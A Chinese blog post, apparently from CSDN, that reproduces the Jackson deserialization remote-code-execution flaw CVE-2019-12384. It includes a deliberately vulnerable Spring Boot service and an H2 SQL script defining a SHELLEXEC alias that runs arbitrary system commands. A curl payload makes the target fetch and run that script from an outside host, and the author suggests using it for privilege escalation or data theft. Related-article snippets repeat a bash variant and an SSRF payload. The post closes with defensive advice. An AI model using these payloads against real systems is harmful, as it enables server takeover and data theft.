.net core webapi执行sql_Jackson序列化远程执行漏洞【CVE201912384】

最新推荐文章于 2023-05-01 12:29:09 发布
最新推荐文章于 2023-05-01 12:29:09 发布
阅读量221 收藏
点赞数
文章标签: .net core webapi执行sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42298973/article/details/113038888
版权

   关于Json反序列化漏洞出现很多次。不管是Jackson抑或是FastJson,每隔一段时间总是暴露出一些漏洞来,比如去年Jackson序列化远程执行漏洞【CVE-2019-12384】。引入log4,h2databased框架和使用jackjson并开启enableDefaultTyping。对外暴露任意形式接口(webAPI、RMI等),而且接口必须存在正反序列化。在这种情况下会出现远程执行漏洞。

下面就以springmvc构建webAPI一个例子。

1.启动类

package com.evil.json;import org.springframework.boot.SpringApplication;import org.springframework.boot.autoconfigure.SpringBootApplication;@SpringBootApplicationpublic class App {    public static void main(String[] args) {        SpringApplication.run(App.class, args);    }}

 2.序列化

@Configurationpublic class WebConfiguration {    /**     * Spring Boot默认JSON解析框架     * @return     */    @Bean    public ObjectMapper objectMapper(){        ObjectMapper mapper = new ObjectMapper();        mapper.enableDefaultTyping();        return mapper;    }}

3.接口类

package com.evil.json;import org.springframework.web.bind.annotation.RequestBody;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.RequestMethod;import org.springframework.web.bind.annotation.RestController;@RestController@RequestMapping(value = "/api")public class ReqController {    @RequestMapping(value = "/test", method = {RequestMethod.POST, RequestMethod.GET})    public Object baseRequset(@RequestBody Object o){         return o;     };}

攻击方法:

  1. 目标web服务器是window系统可构建以下脚本,上传到任意可访问路径。本样例脚本上传到了http://tangxiaoling-darylho123.stor.sinaapp.com/win.sql。脚本内容如下:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {            String[] command = {"cmd", "/c", cmd};            java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");            return s.hasNext() ? s.next() : "";  }$$;CALL SHELLEXEC('calc')

此脚本攻击会打开win系统的计算器程序。修改具体的脚本进行其它的一系列的脚本攻击进行任意的注入(如提权,上传敏感数据等)。

在win10打开cmd

curl -H "Content-TYpe:application/json" -X POST  -d "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://tangxiaoling-darylho123.stor.sinaapp.com/win.sql'\"}]" -v "http://127.0.0.1:8080/api/test"

88a3e0d7bef223b15a3ac2bf37fff15f.png

143f40b9ffd3c67ec1b91761c4a83c7c.png

    当然我们也可以针对linux服务器的注入,只要修改注入脚本即可。如果是以root的身份启动web服务,则基本上可以为所欲为,妥妥地变成肉鸡。鉴于文章不宜太长,这里就不做展示了。需要脚本案例可私信。另外,除了jackJson以外,fastJson(1.2.58包含及以下版本)也有同样的问题。后面的版本已经修复。fastJson是基于黑名单机制,把一些危险列入黑名单中.具体黑名单在其源码com.alibaba.fastjson.parser.ParserConfig类中可以找到。黑名单已经进行简单的加密处理,如下图所示。

6fc14f051b49aff2f8237b793f97944f.png

    此攻击比较鸡肋,前提条件特殊。本次案例仅仅是做一个警示案例。在实际工作中要警惕以下两点

   第1点:要警惕不同框架之间同时使用可能会产生漏洞。本次案例Json序列化框架是一个桥梁,和log4j以及H2database则共同作用提供了注入点。

    第2点:在代码审查中要注意对正反序列化框架的使用,对全局性应该考虑关闭其enableDefaultTyping。对外接口的序列化使用也应关闭。防止无意的引入漏洞。更要防止有意的留后门。

innerpower内生力
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vs2013下创建webapi创建sql数据库接口.下一章我会更新iis发布,以及winfrom下post,get请求!
Kevin_chengguohao的博客
11-06 4056
这是我在工作中用到的一些知识点。很实用的入门级。大神勿喷! 本篇主要实现ASP.NET WebAPI 连接数据库获取数据,并以Json字符串格式返回。 1.创建ASP.NET Web Application(.NET Framework)项目;
java 漏洞复现_CVE-2019-12384漏洞分析及复现
weixin_42463997的博客
03-02 1073
原标题:CVE-2019-12384漏洞分析及复现*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。引言近期关于Jackson的RCE漏洞CVE-2019-12384爆出,关于漏洞的复现以及依赖,这里已经给出,笔者这边使用java的环境重新复现了一下,权当给各位看官当个翻译,也让在java上进行漏洞复现的兄弟们少走点弯路。环境准备本...
创建WebAPI接口实现前端数据上传
weixin_42870015的博客
05-14 1251
创建WebAPI接口实现前端数据上传创建webapi 创建webapi 1-1.创建一个webapi接口 1.打开vs 选择新建专案 出现如下界面,选择路径与名称 点击确定 选择 完成创建后,右键点击Models,选择 加入–控制器 选择webapi 2 控制器 -空白 点击新增 设置控制器名字(…)自己设哦!!! 打开刚才创建的models文件 在内部添加所需获取的参数名称 using System.Web.Http; namespace drexcel.Models {
SQLServer 調用 WebAPI [WSDL/Json]
sinat_28782331的博客
06-15 605
SQL調用WebAPI
jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现
weixin_39830200的博客
02-23 407
文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html环境搭建引入jar包:ssrf payload:"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
最新发布
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
ASP.NET Web应用程序常见网络安全漏洞解决方案分析.pdf
09-19
ASP.NET Web应用程序常见网络安全漏洞解决方案分析.pdf
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。并启动一个http server: CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"/bin/bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHEL
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
BertramLAU的专栏
07-23 1996
系统环境 CentOS 7.7.1908 CDH 6.3.1 Jackson-databind 2.9.8/2.9.9/2.9.9.3 漏洞描述 【CVE】 CVE-2019-12384 【漏洞描述】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 【受影响版本】 Jackson-databin
WebApi的安全性及其解决方案
dienen0325的博客
03-16 678
一、前言   WebApi的小白想要了解一些关于WebApi安全性相关的问题,本篇文章是整理一些关于WebApi安全、权限认证的文章。 二、内容正文  2.1 不进行验证  客户端调用:http://api.xxx.com/getInfo?Id=value 如上,这种方式简单粗暴,在浏览器直接输入"http://api.xxx.com/getInfo?Id=value",即可获取到相关的...
互联网API开放平台安全设计(一)--Web安全漏洞
weixin_40657079的博客
03-13 913
什么是XSS攻击手段 XSS攻击使用Javascript脚本注入进行攻击 例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端。 <script>alert('sss')</script> <script>window.location.href='http://www.itmayiedu.com';...
常见的API接口漏洞总结
summer_fish的专栏
05-01 3586
熟悉这些漏洞非常重要,这样您就可以轻松识别它们,在参与渗透测试期间利用它们,并将其报告给组织,以防止犯罪分子将您的客户拖入头条新闻。现在您已经熟悉了 Web 应用程序、API 及其弱点。
java jackson漏洞_CVE-2019-12384:Jackson序列化漏洞分析
weixin_35242442的博客
02-16 417
content = ARGV[0]puts "Mapping"mapper = ObjectMapper.newmapper.enableDefaultTypingmapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);puts "Serializing"obj = mapper.readValue(content, j...
jackson 序列化_安全通告:jackson-databind序列化漏洞(CVE-2020-24616)
05-19
是的,jackson-databind 序列化漏洞(CVE-2020-24616)是一个安全问题,可能会导致远程代码执行。该漏洞存在于 jackson-databind 库中,该库是一个流行的 Java 序列化/反序列化库,广泛用于各种应用程序和框架中。攻击者可以利用该漏洞构造恶意序列化数据,从而在受影响的应用程序中执行任意代码。 建议开发人员及时检查其应用程序是否使用了 jackson-databind 库,并升级到最新版本,以避免受到此漏洞的影响。同时,应该注意避免将不受信任的数据传递给 jackson-databind 序列化器,以减少漏洞利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值